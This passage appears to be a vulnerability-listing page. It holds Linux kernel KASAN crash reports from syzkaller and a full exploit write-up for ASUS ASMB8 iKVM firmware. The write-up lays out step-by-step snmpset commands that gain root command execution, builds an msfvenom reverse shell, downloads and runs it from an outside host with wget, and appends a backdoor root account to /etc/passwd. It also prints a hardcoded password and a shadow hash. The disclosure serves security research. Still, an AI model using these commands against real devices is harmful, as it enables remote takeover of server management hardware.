\_\_do\_sys\_newlstat+0x8b/0x110  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Memory state around the buggy address:  
ffff8880273c4200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
ffff8880273c4280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
\>ffff8880273c4300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
^  
ffff8880273c4380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
ffff8880273c4400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
\==================================================================

CVE-2023-26605: LKML: Palash Oswal: KASAN: use-after-free Read in inode_cgwb_move_to_attached

ASUS ASMB8 iKVM firmware through 1.14.51 allows remote attackers to execute arbitrary code by using SNMP to create extensions, as demonstrated by snmpset for NET-SNMP-EXTEND-MIB with /bin/sh for command execution.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Exploit Title: AMI/ASUS ASMB8 iKVM RCE and SSH Root Access # Date: 2023-02-16 # Exploit Author: d1g@segfault.net for NetworkSEC \[NWSSA-002-2023\] # Vendor Homepage: https://servers.asus.com/search?q=ASMB8 # Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others) # Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl # CVE: Currently Unassigned (CVE-2023-XXXXX) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++ 0x00 DESCRIPTION ++++++++++++++++++++ During a recent engagement, a remote server management interface has been discovered. Furthermore, SNMPv2 was found to be enabled, offering write access to the private community, subsequently allowing us to introduce SNMP arbitrary extensions to achieve RCE. We also found a hardcoded account sysadmin:superuser by cracking the shadow file (md5crypt) found on the system and identifed an "anonymous" user w/ the same password, however a lock seems to be in place to prevent using these credentials via SSH (running defshell as default shell). +++++++++++++++ 0x01 IMPACT +++++++++++++++ By exploiting SNMP arbitrary extension, we are able to run any command on the system w/ root privileges, and we are able to introduce our own user circumventing the defshell restriction for SSH. +++++++++++++++++++++++++++++++ 0x02 PROOF OF CONCEPT (PoC) +++++++++++++++++++++++++++++++ At first, we have to create required extensions on the system, e.g. via snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "\[command\]"' and if everything is set, we can just run that command by snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects which will execute our defined command and show us its output. +++++++++++++++++++++++++++++++ 0x03 SSH Remote Root Access +++++++++++++++++++++++++++++++ The identified RCE can be used to transfer a reverse tcp shell created by msfvenom for arm little-endian, e.g. msfvenom -p linux/armle/shell\_reverse\_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin We can now transfer the binary, adjust permissions and finally run it: snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"' snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"' snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"' Again, we have to request execution of the lines in the MIB via: snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects We get a reverse connection from the host, and can now act on the local system to easily echo our own line into /etc/passwd: echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd By setting the standard shell to /bin/sh, we are able to get a SSH root shell into the system, effectively circumventing the defshell restriction. $ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # uname -a Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown # uptime 15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25 # head -n 1 /etc/shadow sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7::: --- #EOF

CVE-2023-26602

In the Linux kernel before 6.1.13, there is a double free in net/mpls/af_mpls.c upon an allocation failure (for registering the sysctl table under a new location) during the renaming of a device.

CVE-2023-26545

In the Linux kernel 6.0.8, there is a use-after-free in run_unpack in fs/ntfs3/run.c, related to a difference between NTFS sector size and media sector size.

Hello,  
I found the following issue using syzkaller on:  
HEAD commit : e60276b8c11ab4a8be23807bc67b048cfb937dfa (v6.0.8)  
git tree: stable

C Reproducer : https://gist.github.com/oswalpalash/76ca8fcd92332c75a0a7efaa26269c42  
Kernel .config :  
https://gist.github.com/oswalpalash/0962c70d774e5ec736a047bba917cecb

Console log :  
loop0: detected capacity change from 0 to 4096  
ntfs3: loop0: Different NTFS' sector size (1024) and media sector size (512)  
\==================================================================  
BUG: KASAN: use-after-free in run\_unpack+0x89a/0x940  
Read of size 1 at addr ffff888024b21900 by task syz-executor.0/16961

CPU: 0 PID: 16961 Comm: syz-executor.0 Not tainted 6.0.8-pasta #2  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
1.13.0-1ubuntu1.1 04/01/2014  
Call Trace:  
<TASK>  
dump\_stack\_lvl+0xcd/0x134  
print\_report.cold+0xe5/0x63a  
kasan\_report+0x8a/0x1b0  
run\_unpack+0x89a/0x940  
run\_unpack\_ex+0xb8/0x620  
ntfs\_iget5+0xc18/0x3270  
ntfs\_fill\_super+0x27de/0x3d30  
get\_tree\_bdev+0x440/0x760  
vfs\_get\_tree+0x89/0x2f0  
path\_mount+0x121b/0x1cb0  
do\_mount+0xf3/0x110  
\_\_x64\_sys\_mount+0x18f/0x230  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd  
RIP: 0033:0x7fcf8309146e  
Code: 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f  
84 00 00 00 00 00 90 f3 0f 1e fa 49 89 ca b8 a5 00 00 00 0f 05 <48> 3d  
01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48  
RSP: 002b:00007fcf83dc4a08 EFLAGS: 00000206 ORIG\_RAX: 00000000000000a5  
RAX: ffffffffffffffda RBX: 0000000020000200 RCX: 00007fcf8309146e  
RDX: 0000000020000000 RSI: 0000000020000100 RDI: 00007fcf83dc4a60  
RBP: 00007fcf83dc4aa0 R08: 00007fcf83dc4aa0 R09: 0000000020000000  
R10: 0000000000000000 R11: 0000000000000206 R12: 0000000020000000  
R13: 0000000020000100 R14: 00007fcf83dc4a60 R15: 0000000020002a00  
</TASK>

Allocated by task 6460:  
kasan\_save\_stack+0x1e/0x40  
\_\_kasan\_kmalloc+0xa6/0xd0  
kmalloc\_reserve+0x32/0xd0  
\_\_alloc\_skb+0x11a/0x320  
tcp\_stream\_alloc\_skb+0x38/0x550  
tcp\_sendmsg\_locked+0xc44/0x2fd0  
tcp\_sendmsg+0x2b/0x40  
inet\_sendmsg+0x99/0xe0  
sock\_sendmsg+0xc3/0x120  
sock\_write\_iter+0x291/0x3d0  
vfs\_write+0x9ca/0xd90  
ksys\_write+0x1e8/0x250  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Freed by task 6460:  
kasan\_save\_stack+0x1e/0x40  
kasan\_set\_track+0x21/0x30  
kasan\_set\_free\_info+0x20/0x30  
\_\_kasan\_slab\_free+0xf5/0x180  
kfree+0x15e/0x540  
skb\_free\_head+0xac/0x110  
skb\_release\_data+0x56f/0x850  
skb\_release\_all+0x46/0x60  
\_\_kfree\_skb+0x11/0x20  
tcp\_ack+0x1e54/0x5af0  
tcp\_rcv\_established+0x14b5/0x2130  
tcp\_v4\_do\_rcv+0x701/0xd00  
\_\_release\_sock+0x12f/0x3a0  
release\_sock+0x54/0x1b0  
tcp\_sendmsg+0x36/0x40  
inet\_sendmsg+0x99/0xe0  
sock\_sendmsg+0xc3/0x120  
sock\_write\_iter+0x291/0x3d0  
vfs\_write+0x9ca/0xd90  
ksys\_write+0x1e8/0x250  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Last potentially related work creation:  
kasan\_save\_stack+0x1e/0x40  
\_\_kasan\_record\_aux\_stack+0x7e/0x90  
call\_rcu+0x99/0x740  
xfrm\_policy\_kill+0x120/0x250  
xfrm\_policy\_delete+0x65/0x90  
sk\_common\_release+0x24e/0x330  
inet\_release+0x12e/0x270  
\_\_sock\_release+0xcd/0x280  
sock\_close+0x18/0x20  
\_\_fput+0x27c/0xa90  
task\_work\_run+0xe0/0x1a0  
exit\_to\_user\_mode\_prepare+0x25d/0x270  
syscall\_exit\_to\_user\_mode+0x19/0x50  
do\_syscall\_64+0x42/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

The buggy address belongs to the object at ffff888024b21800  
which belongs to the cache kmalloc-1k of size 1024  
The buggy address is located 256 bytes inside of  
1024-byte region \[ffff888024b21800, ffff888024b21c00)

The buggy address belongs to the physical page:  
page:ffffea000092c840 refcount:1 mapcount:0 mapping:0000000000000000  
index:0x0 pfn:0x24b21  
flags: 0xfff00000000200(slab|node=0|zone=1|lastcpupid=0x7ff)  
raw: 00fff00000000200 ffffea0000a00188 ffffea000077b9c8 ffff888011840700  
raw: 0000000000000000 ffff888024b21000 0000000100000002 0000000000000000  
page dumped because: kasan: bad access detected  
page\_owner tracks the page as allocated  
page last allocated via order 0, migratetype Unmovable, gfp\_mask  
0x2c2220(\_\_GFP\_HIGH|\_\_GFP\_ATOMIC|\_\_GFP\_NOWARN|\_\_GFP\_COMP|\_\_GFP\_NOMEMALLOC|\_\_GFP\_THISNODE),  
pid 16, tgid 16 (ksoftirqd/0), ts 86734280820, free\_ts 86664849571  
prep\_new\_page+0x2c6/0x350  
get\_page\_from\_freelist+0xae9/0x3a80  
\_\_alloc\_pages+0x321/0x710  
cache\_grow\_begin+0x75/0x360  
kmem\_cache\_alloc\_node\_trace+0xbe2/0xd40  
\_\_kmalloc\_node\_track\_caller+0x38/0x60  
kmalloc\_reserve+0x32/0xd0  
\_\_alloc\_skb+0x11a/0x320  
tcp\_stream\_alloc\_skb+0x38/0x550  
tcp\_write\_xmit+0x1c72/0x6170  
\_\_tcp\_push\_pending\_frames+0xaa/0x380  
tcp\_rcv\_established+0x9d5/0x2130  
tcp\_v4\_do\_rcv+0x701/0xd00  
tcp\_v4\_rcv+0x3cf0/0x3f70  
ip\_protocol\_deliver\_rcu+0x9b/0x7c0  
ip\_local\_deliver\_finish+0x2fb/0x4e0  
page last free stack trace:  
free\_pcp\_prepare+0x5ab/0xd00  
free\_unref\_page+0x19/0x410  
slab\_destroy+0x14/0x50  
drain\_freelist+0x9c/0xe0  
cache\_reap+0x1b9/0x2f0  
process\_one\_work+0x9c7/0x1650  
worker\_thread+0x623/0x1070  
kthread+0x2e9/0x3a0  
ret\_from\_fork+0x1f/0x30

Memory state around the buggy address:  
ffff888024b21800: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
ffff888024b21880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
\>ffff888024b21900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
^  
ffff888024b21980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
ffff888024b21a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
\==================================================================

Tag

#linux